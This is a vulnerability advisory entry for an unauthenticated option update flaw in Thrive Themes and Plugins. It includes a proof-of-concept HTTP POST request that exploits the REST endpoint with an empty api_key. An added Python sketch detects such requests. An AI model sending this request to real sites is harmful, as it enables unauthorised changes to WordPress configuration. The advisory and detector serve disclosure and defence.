wpexploit
Chloe Chamberland, Ram Gall, Charles Sweethill
WPEX-ID: 35ACD2D8-85FC-4AF5-8F6C-224FA7D92900
Mar 24, 2021 - 12:00 a.m.

All Thrive Themes and Plugins - Unauthenticated Option Update


EPSS: 0.001 (Low), percentile 38.8%

The plugins and themes register a REST API endpoint associated with Zapier functionality. The endpoint was intended to require an API key, but in vulnerable versions it could be accessed by supplying an empty api_key parameter if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.

POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=
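
A detection sketch for the request pattern described above, added here as an example and not part of the original advisory or the vendor's code: it flags POSTs to the advisory's route whose api_key is missing or empty. Covering the ?rest_route= form of WordPress REST URLs and JSON bodies goes beyond the single request shown; the function names and sample requests are constructed for illustration.

```python
import json
from urllib.parse import parse_qs, unquote, urlsplit

ROUTE = "/td/v1/optin/subscription"  # REST route named in the advisory

def rest_route(target):
    """Return the WordPress REST route a request target addresses ('/' if none)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if "rest_route" in query:  # plain-permalink form: /?rest_route=/td/v1/...
        route = query["rest_route"][0]
    else:  # pretty-permalink form: /wp-json/td/v1/...
        route = unquote(parts.path).partition("/wp-json/")[2]
    return "/" + route.strip("/").lower()

def last_values(encoded):  # parse a query string or form body, keeping empty values
    return {k: v[-1] for k, v in parse_qs(encoded, keep_blank_values=True).items()}

def is_keyless_optin_post(raw_request):
    """True for a POST to ROUTE whose api_key is missing or empty."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    request_line = lines[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return False
    if rest_route(request_line[1]) != ROUTE:
        return False
    headers = dict(l.lower().split(":", 1) for l in lines[1:] if ":" in l)
    params = last_values(urlsplit(request_line[1]).query)
    if "json" in headers.get("content-type", ""):  # REST parameters may arrive as JSON
        try:
            data = json.loads(body)
        except ValueError:
            data = {}
        params.update(data if isinstance(data, dict) else {})
    else:
        params.update(last_values(body.strip()))
    key = params.get("api_key")
    return key is None or str(key).strip() == ""

# Constructed sample requests (not real traffic); hook_url values are placeholders.
HEAD = "POST /wp-json/td/v1/optin/subscription HTTP/1.1\r\nHost: example.test\r\n"
FORM = "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
SAMPLES = [
    HEAD + FORM + "hook_url=placeholder&api_key=",                     # flagged
    HEAD + FORM + "hook_url=placeholder&api_key=constructed-key-123",  # not flagged
    HEAD + 'Content-Type: application/json\r\n\r\n{"hook_url": "placeholder"}',  # flagged
    "GET /wp-json/wp/v2/posts HTTP/1.1\r\nHost: example.test\r\n\r\n",  # not flagged
]
print([is_keyless_optin_post(r) for r in SAMPLES])
```

Access logs usually omit POST bodies, so this check needs input from a WAF, reverse proxy or packet capture that records them.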
